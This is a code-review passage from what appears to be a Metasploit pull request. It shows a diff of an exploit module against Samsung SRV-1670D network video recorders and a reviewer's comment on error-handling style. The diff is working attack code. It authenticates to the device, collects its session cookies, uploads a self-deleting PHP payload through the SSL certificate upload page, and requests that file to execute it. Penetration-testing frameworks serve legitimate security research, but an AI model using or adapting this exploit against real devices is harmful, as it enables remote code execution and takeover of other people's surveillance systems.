modules/exploits/linux/http/samsung_srv_1670d_upload_exec.rb

```diff
@@ -0,0 +1,241 @@
+				data4 = data3
+
+				print_status('Logging...') 
+
+			 	resp = send_request_cgi({
+					'uri'     =>  "/login",
+					'version' => '1.1',
+					'method' => 'POST',
+					'vars_post'=>
+						{
+							'data1' => data1,
+							'data2' => data2,
+							'data3' => data3,
+							'data4' => data4
+						},
+					'headers' =>
+						{
+						   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
+						   'DNT' => "1",
+						   'Cookie' => "IESEVEN=1"
+						}
+				})
+
+				unless resp
+					print_error("Connection timed out.")
+					return Exploit::CheckCode::Unknown
+				end
+				
+				if resp and resp.code == 200  and resp.body !~ /ID incorrecte/  and resp.body =~ /setCookie\('NVR_DATA1/
+
+					print_good('Authentication Succeeded') 
+
+					nvr_d1 = $1 if resp.body =~ /setCookie\('NVR_DATA1', '(\d\.\d+)'/
+					nvr_d2 = $1 if resp.body =~ /setCookie\('NVR_DATA2', '(\d+)'/
+					nvr_d3 = $1 if resp.body =~ /setCookie\('NVR_DATA3', '(0x\h\h)'/
+					nvr_d4 = $1 if resp.body =~ /setCookie\('NVR_DATA4', '(0x\h\h)'/
+					nvr_d7 = $1 if resp.body =~ /setCookie\('NVR_DATA7', '(\d)'/
+					nvr_d8 = $1 if resp.body =~ /setCookie\('NVR_DATA8', '(\d)'/
+					nvr_d9 = $1 if resp.body =~ /setCookie\('NVR_DATA9', '(0x\h\h)'/
+
+					cookie = "IESEVEN=1; NVR_DATA1=#{nvr_d1}; NVR_DATA2=#{nvr_d2}; NVR_DATA3=#{nvr_d3}; NVR_DATA4=#{nvr_d4}; NVR_DATA7=#{nvr_d7}; NVR_DATA8=#{nvr_d8}; NVR_DATA9=#{nvr_d9}"
+
+					payload_name = "#{rand_text_alpha(8)}.php"
+
+					print_status("Generating payload[ #{payload_name} ]...") 
+
+					php_payload = get_write_exec_payload(:unlink_self=>true)
+				
+					print_status('Uploading payload...') 
+
+					data = Rex::MIME::Message.new
+					data.add_part("2", nil, nil, 'form-data; name="is_apply"')
+					data.add_part("1", nil, nil, 'form-data; name="isInstall"')
+					data.add_part("0", nil, nil, 'form-data; name="isCertFlag"')
+					data.add_part(php_payload, 'application/x-httpd-php', nil, "form-data; name=\"attachFile\"; filename=\"#{payload_name}\"")
+					post_data = data.to_s
+
+					resp = send_request_cgi({
+
+						'uri'      => normalize_uri('/network_ssl_upload.php'),
+						'method'   => 'POST',
+						'vars_get' => 
+							{
+							'lang' => 'en'
+							},
+						'headers' =>
+							{
+							   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
+							},
+						'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+						'cookie'   => cookie,
+						'data'     => post_data
+
+					    })
+
+					unless resp
+						print_error("Connection timed out.")
+						return Exploit::CheckCode::Unknown
+					end
+
+					if resp and resp.code == 200 
+						print_status('Executing payload...') 
+						upload_uri = normalize_uri("/upload/" + payload_name)
+						send_request_cgi({
+							'uri'    => upload_uri,
+							'method' => 'GET'
+						},5)
+
+						unless resp
+							print_error("Connection timed out.")
+							return Exploit::CheckCode::Unknown
```

Comment:
`Exploit::CheckCode::*` is reserved for `check` methods. Use `fail_with` instead.

`fail_with` `Failure::Unreachable` in this instance